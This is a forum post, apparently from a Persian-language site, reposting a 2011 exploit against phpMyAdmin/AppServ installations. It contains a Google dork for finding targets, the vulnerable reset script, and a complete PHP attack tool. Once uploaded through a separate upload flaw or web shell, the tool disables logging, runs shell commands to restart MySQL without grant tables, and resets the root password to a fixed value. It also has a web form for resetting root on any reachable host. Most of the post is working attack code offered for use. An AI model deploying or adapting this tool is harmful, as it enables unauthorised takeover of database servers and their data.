SpareNet Servers Advertising & Link Exchange

اطلاعیه

بستن
هیچ اطلاعیه ای هنوز ایجاد نشده است .

phpMyAdmin Root Password Reset

بستن
X
 
  • فیلتر
  • زمان
  • نمایش
پاک کردن همه
نوشته‌های جدید

  • phpMyAdmin Root Password Reset

    [align=LEFT]

    کد:
    # Exploit Title: [phpMyAdmin Root Password]
    # Date: [21/6/2011]
    # Home: 1337day.com
    # Author: [Piaster (wadelamin)]
    # phpmyadmin: Software Link: [www.appservnetwork.com ||www.phpmyadmin.net]
    # Version: [all phpmyadmin Version]
    # Category:: [remote, local]
    # Google dork: [inurl:phpMyAdmin ||  The AppServ Open Project - [all Version] for Windows ]
    # Tested on: [Windows & unix]
    # E-mail: [email protected]
    # Page: http://www.facebook.com/Pias.Piaster
    
    File Bug:
    //-----------------C:\AppServ\MySQL\scripts/resetpwd.php----------------//
    
    echo "Welcome to AppServ MySQL Root Password Reset Program\n\n";
    
    AppServCMD();
    
    function AppServCMD() {
        define('STDIN',fopen("php://stdin","r"));
        echo " Enter New Password : ";
        $input = trim(fgets(STDIN,256));
        $input = ereg_replace('\"', "\\\"", $input);
        $input = ereg_replace('\'', "\'", $input);
        echo "\n   Please wait ...................................\n\n";
        exec ("net stop mysql");
        exec ('start /b C:\AppServ\MySQL\bin\mysqld-nt.exe --skip-grant-tables --user=root');
    
    //You can add a password and then request the file via the browser
    
        exec ("C:\[AppServ]\MySQL\bin\mysql -e \"update mysql.user set PASSWORD=PASSWORD('[root pwd]') where user = 'root';\"");
        exec ("C:\[AppServ]\MySQL\bin\mysqladmin -u root shutdown");
        sleep(3);
        exec ("net start mysql");
    }
    //--------------------------------END-----------------------------------//
    
    I've modified the file and then request the file from abroad
    But first there must be a upload exploit on server so they can upload the tool like any other tool or Shell Script
    And then request the file via the browser
    
    There Important Note:
    If the Windows server can access phpMyAdmin immediately
    if the file to complete the process this means that
    it is restarted the Mysql and then change the password.
    
    //---------------------------------Exploit the vulnerability tool------------------------//
    <?
    echo "<style type='text/css'>* { margin: 0; padding: 0; }A {color:#ffffff;text-decoration:none;}A:hover {color:yellow;text-decoration:underline;}body,table { font-family:verdana;font-size:11px;color:white;background-color:#993333; }.table5 { font-family:verdana;font-size:11px;color:white;background-color:black; }table { width:30%; }table,td { border:1px solid #808080;margin-top:2;margin-bottom:2;padding:5px; }input{ color:#000000;border:2px solid #666666; }.barheader,.mainpaneltable,td { border:1px solid #333333; }.input{ border:2px  gold;margin:0; }input[type='submit'] { border:1px solid black; } input[type='text'] { padding:5px;}input[type='button'] { background-color:gold; }.select,option,input[type='button']:hover { background-color:red; }input[type='submit'] { background-color:orange }.select,option,input[type='submit']:hover { background-color:red; }input,input[type='text']:hover { background-color:#AF2C07; }textarea,.mainpanel input,select,option { background-color:orange; }</style>";echo "<head><title>PiAsTeR VS phpMyAdmin</title><div style=\"background: orange;\"><p align=\"center\"><font size=\"2\" <h1><font color = red><b>PiAsTeR</font> VS <font color = red>phpMyAdmin</font></h1></b></p><hr color=\"black\"</div></div><center><BR>";$f = '<a href="http://www.facebook.com/Pias.Piaster" target="_blank">Facebook</a>';
    
    @set_time_limit(0);
    @ini_restore("safe_mode");
    @ini_restore("allow_url_fopen");
    @ini_restore("open_basedir");
    @ini_restore("disable_functions");
    @ini_restore("safe_mode_exec_dir");
    @ini_restore("safe_mode_include_dir");
    
    @ini_set('error_log',NULL);
    @ini_set('log_errors',0);
    @ini_set('max_execution_time',0);
    @ini_set('output_buffering',0);
    
    $win = strtolower(substr(PHP_OS,0,3)) == "win";
    if(function_exists('exec')){$pias = exec;}
    elseif(function_exists('shell_exec')){$pias = shell_exec;}
    elseif(function_exists('system')) {$pias = system ;}
    elseif(function_exists('passthru')) { $pias = passthru ;}
    
    if($win) {
        define('STDIN',fopen("php://stdin","r"));
        $input = trim(fgets(STDIN,256));
        $input = ereg_replace('\"', "\\\"", $input);
        $input = ereg_replace('\'', "\'", $input);
        echo "\n   Please wait ...................................\n\nGoodluck ... <br>USER: root & PASSWORD: piaster";
        $pias("net stop mysql");
        $pias('start /b C:\AppServ\MySQL\bin\mysqld-nt.exe --skip-grant-tables --user=root');
        $pias("C:\AppServ\MySQL\bin\mysql -e \"update mysql.user set PASSWORD=PASSWORD('piaster') where user = 'root';\"");
        $pias("C:\AppServ\MySQL\bin\mysqladmin -u root shutdown");
        sleep(3);
        $pias("net start mysql");} 
    
    if(!$win) {
    echo '<br><br><br><form action="#" method="post"><p align="center"><table><tr><td>user<input name="dbu" size="20" value = ' . $_REQUEST['dbu'] . ' ><td>password<input name="dbp" size="20" value = ' . $_REQUEST['dbp'] . ' ><td>host<input name="dbh" size="20" value = ' . $_REQUEST['dbh'] . '></tr></table><input type="submit" value="GO" name = "pias" /> </p></form></td></tr><td><tr>';
    
    if(isset($_REQUEST['pias'])){
    
    $dbu = $_REQUEST['dbu'];
    $dbp = $_REQUEST['dbp'];
    $dbh = $_REQUEST['dbh']? $_REQUEST['dbh'] : 'localhost';
    $conn = @mysql_connect($dbh, $dbu, $dbp);
    $select = @mysql_select_db('mysql', $conn);
    if (!$select) {
    echo @mysql_error();}
    $t1 = "UPDATE mysql.user set PASSWORD=PASSWORD('piaster') where user = 'root';";
    $go1 = @mysql_query( $t1 , $conn);
    if($go1){echo '<center><br>Goodluck ... Now Wait Until Mysql Restart and Come back with USER: root & PASSWORD: piaster</center>';}
    else echo 'database mysql not acsses or not found ty agin';}}
    
    echo '<br><br>By Piaster :: [email protected] :: '. $f ;
    
    ?>
    [/align]
    [align=center][/align]
صبر کنید ..
X